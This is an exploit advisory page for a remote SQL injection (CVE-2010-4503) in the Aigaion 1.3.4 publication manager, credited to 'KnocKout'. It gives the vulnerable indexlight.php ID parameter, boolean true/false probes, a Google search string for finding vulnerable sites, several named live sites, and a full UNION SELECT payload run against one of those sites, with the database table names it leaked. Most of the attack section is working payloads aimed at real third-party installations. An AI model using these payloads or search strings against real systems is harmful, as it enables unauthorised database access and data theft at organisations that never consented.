Aigaion 1.3.4 <= Remote SQL Injection Vulnerability

2010-12-12 / 2010-12-13
Credit: KnocKout
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-4503
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================================ GOOD DAY FOR INJ3CT0R 1337 Exploit Database ;) ================================================================ Aigaion 1.3.4 <= Remote SQL Injection Vulnerability ================================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7 1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1 3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3 3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3 7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7 1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1 3 >> Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ############################################ 7 1 I'm KnocKout 1337 Member from 1337 DataBase 1 3 ############################################ 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Aigaion |~Price : N/A |~Version : 1.3.4 |~Software: http://www.aigaion.nl/ |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~sqL : MysqL |~Google Keyword : "Powered by Aigaion" inurl:indexlight.php |-Good:) |[~]Date : "22.11.2010" |[~]Tested on : (L):Vista (R):Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Demos: http://publications.amiproject.org/ http://www.etrustproject.eu/aigaion/ http://publikaciok.mtk.sze.hu/web/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| indexlight.php SQL Injection~~~~~~~~~~~}| http://$Site/$path/indexlight.php?page=export&type=single&format=RIS&ID=1 {SQL Injection} http://$Site/$path/indexlight.php?page=export&type=single&format=RIS&ID=1 and 1=1 {True} http://$Site/$path/indexlight.php?page=export&type=single&format=RIS&ID=1 and 1=0 {False} Ex; http://publications.amiproject.org/ [~] SQL Injecting http://www.etrustproject.eu/aigaion/indexlight.php?page=export&type=single&format=RIS&ID=1 and 1=0 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from information_schema.tables where table_schema=database() [~] MySQL Error : No [+] Table Names : aigaiongeneral,author,availablerights,config,notecrossrefid,person,personpublicationmark,personpublicationnote,persontopic,publication,publicationauthor,publicationfile,topic,topicpublication,topictopiclink,userrights [OK] To your continue.. =============================================================

References:

http://www.securityfocus.com/bid/45232
http://secunia.com/advisories/42463
http://packetstormsecurity.org/files/view/96077/aigaion134-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top